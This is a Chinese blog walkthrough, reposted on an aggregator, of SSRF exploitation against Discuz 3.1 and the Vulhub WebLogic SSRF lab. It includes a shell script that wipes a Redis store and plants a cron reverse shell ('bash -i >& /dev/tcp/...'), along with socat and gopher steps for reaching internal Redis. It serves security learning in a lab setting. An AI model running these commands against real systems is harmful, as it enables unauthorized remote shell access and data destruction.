【SSRF漏洞】实战演示 超详细讲解

这篇具有很好参考价值的文章主要介绍了【SSRF漏洞】实战演示 超详细讲解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

💕💕💕 博主昵称:摆烂阳💕💕💕

🥰博主主页链接https://blog.csdn.net/qinshuoyang1?type=blog
👩‍💻博主研究方向:web渗透测试 、python编程
📃 博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导

————————————————


【SSRF漏洞】实战演示 超详细讲解

一、实战discuz3.1版本的ssrf漏洞

1、准备工作

第一步:

创建一个后缀为.sh的文件

文件内容为:

redis-cli -h $1 -p $2 flushall echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1 redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit

【SSRF漏洞】实战演示 超详细讲解
第二步:

2、运行该.sh文件

【SSRF漏洞】实战演示 超详细讲解

此时可以看到kali可以监听到

【SSRF漏洞】实战演示 超详细讲解

2、开始实战

第一步:

设置监听

先yum下载socat工具

yum install socat

Payload:

socat -v tcp-listen:端口,fork tcp-connect:localhost:6379

【SSRF漏洞】实战演示 超详细讲解
第二步:

4、再次发送请求

Payload

bash ssrf.sh ip 端口

【SSRF漏洞】实战演示 超详细讲解
【SSRF漏洞】实战演示 超详细讲解

此时已经成功设置定时任务

第三步:

创建一个日志文件,保存数据

【SSRF漏洞】实战演示 超详细讲解

ps:注意格式一定要为unix 可以用 set ff 进行查看

【SSRF漏洞】实战演示 超详细讲解

第四步:

利用py脚本将日志文件中的内容进行转换为数据包

Payload:

python redis_ssrf.py 1.log

【SSRF漏洞】实战演示 超详细讲解
第五步:

将该数据包保存在kali的文件中

【SSRF漏洞】实战演示 超详细讲解
第六步:

kali开启监听,并在目标网站访问gopher.php文件

【SSRF漏洞】实战演示 超详细讲解
成功获取shell

二、实操vulhub靶场的ssrf漏洞

1、准备工作

(1)、 开启apache和sql服务,并关闭防火墙

【SSRF漏洞】实战演示 超详细讲解

(2)、开启redis服务

【SSRF漏洞】实战演示 超详细讲解

(3)、进入vulhub/weblogic/ssrf 目录下

【SSRF漏洞】实战演示 超详细讲解

(4)、打开docker服务

【SSRF漏洞】实战演示 超详细讲解

(5)、打开docker容器,并查看端口

打开docker容器:

docker-compose up -d

查看端口

docker-compose ps

ps:如果打开docker容器时发生错误,重启一下docker服务便可解决

【SSRF漏洞】实战演示 超详细讲解

2、开始实战

1、进入README.md文件中查看教程

【SSRF漏洞】实战演示 超详细讲解

2、进去目标网址,进行抓包

【SSRF漏洞】实战演示 超详细讲解

3、发送到repeater模块中,并修改信息

【SSRF漏洞】实战演示 超详细讲解

4、此时可以在centos中发现已经成功写入计划任务

【SSRF漏洞】实战演示 超详细讲解

5、在kali中开启监听

【SSRF漏洞】实战演示 超详细讲解
此时便已经获取了centos的shell

三、本章小结

通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。

另外警惕大家,网络并非法外之地,大家要谨遵网络安全法,不要做违纪违规的事情!

————————————————

SSRF原理教程跳转链接!!!!文章来源地址https://www.toymoban.com/news/detail-444670.html

到了这里,关于【SSRF漏洞】实战演示 超详细讲解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • OpenCV中图像的缩放与旋转讲解及实战演示(附Python源码)

    需要源码请点赞关注收藏后评论区留言私信~~~ 几何变换是指改变图像的几何结构,例如大小、角度和形状等,让图像呈现出缩放、翻转、映射和透视效果。这些几何变换操作都涉及复杂、精密的计算,OpenCV将这些计算过程封装成非常灵活的方法,开发者只需修改一些参数,就

    2023年04月25日
    浏览(21)
  • 【Android App】三维投影OpenGL ES的讲解及着色器实现(附源码和演示 超详细)

    需要源码请点赞关注收藏后评论区留言私信~~~ 虽然OpenGL的三维制图功能非常强大,但是它主要为计算机设计的,对于嵌入式设备和移动端设备来说显得比较臃肿,所以业界又设计了专供嵌入式设备的OpenGL ES 它相当于OpenGL的精简版,因为嵌入式设备追求性价比,所以能不做的

    2024年02月04日
    浏览(34)
  • 命令执行漏洞超详细讲解

    💕💕💕 博主昵称:摆烂阳💕💕💕 🥰博主主页跳转链接 👩‍💻博主研究方向:web渗透测试 、python编程 📃 博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导 ———————————————— 应用有时需要调用一些执行系统命令的函数

    2024年02月01日
    浏览(28)
  • 【XXE漏洞安全-全网最详细讲解】

    作者: liku君 公众号:里库的安全日记 博主微信:L2440710476(请备注来意) XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。 XXE漏洞

    2024年04月17日
    浏览(31)
  • 【web渗透】CSRF漏洞详细讲解

    💕💕💕 博主昵称:摆烂阳💕💕💕 🥰博主主页链接https://blog.csdn.net/qinshuoyang1?type=blog 👩‍💻 博主研究方向:web渗透测试 📃 博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导 CSRF(Cross-Site Request Forgery),也被称为 one-click attack 或者 sess

    2023年04月08日
    浏览(26)
  • SSRF漏洞拓展

    目录 SSRF漏洞拓展 curl_exec函数 一、ssrf配合gopher协议反弹shell 二、ssrf配合gopher协议写马 三、ssrf配合gopher协议ssh免密登录 四、ssrf配合dict协议反弹shell 实验环境: 1、利用定时任务构造反弹shell 2、进行URL编码 3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码 4、对参

    2024年02月09日
    浏览(29)
  • 漏洞原理——ssrf

    SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用

    2024年02月08日
    浏览(37)
  • Weblogic SSRF漏洞

    2.1bp抓包,测试该漏洞。通过测试端口,查看哪个端口能够进行具体得操作 2.2注入HTTP头,利用Redis反弹shell

    2024年02月07日
    浏览(28)
  • SSRF漏洞

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 严正声明:本文仅限于技术讨论,严禁用于其他用途。 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞 SSRF漏洞形成的原因主要是 服务端提供了从其他服务器应用获取数据的功能,并且未对客户端所传输过来的URL参数进

    2024年02月03日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包